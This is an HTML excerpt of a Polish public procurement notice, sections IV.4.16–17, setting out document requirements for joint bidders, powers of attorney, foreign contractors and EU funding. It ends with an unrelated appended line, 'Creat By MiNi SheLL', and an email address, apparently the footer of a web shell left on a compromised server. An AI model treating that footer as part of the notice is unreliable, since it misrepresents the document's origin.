<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W przypadku złożenia oferty wspólnej każdy z podmiotów winien złożyć następujące dokumenty osobno: oświadczenie o braku podstaw do wykluczenia , oraz aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy, natomiast pozostałe dokumenty poszczególne podmioty składają wspólnie, tj. warunki w nich określone zostaną spełnione, gdy podmioty składające wspólną ofertę spełnią je łącznie. W przypadku, gdy dokumenty podpisywane są przez osobę reprezentującą Wykonawcę inną niż wskazana w dokumencie rejestracyjnym przedsiębiorcy, do oferty należy dołączyć pełnomocnictwo do: reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być przedstawione w oryginale. Dopuszcza się również złożenie w ofercie kopii pełnomocnictwa notarialnie potwierdzonej za zgodność z oryginałem. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 Rozporządzenia Rady Ministrów z dnia 30 grudnia 2009 r., kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę. Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie ( w oryginale) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Dokumenty te Wykonawcy, składający ofertę wspólnie, składają wspólnie. W przypadku złożenia przez wykonawców dokumentów - wykazu dostaw, zawierających wartości usług w innej walucie niż PLN zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych i na stronie internetowej zamawiającego, tabela kursów znajduje się na stronie WWW.nbp.pl. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa: w rozdziale V pkt 9.4 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty, o których mowa w pkt. 11 lit. [a] SIWZ powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument taki powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Pozostałe dokumenty, o których mowa w rozdziale V pkt. 9 SIWZWykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com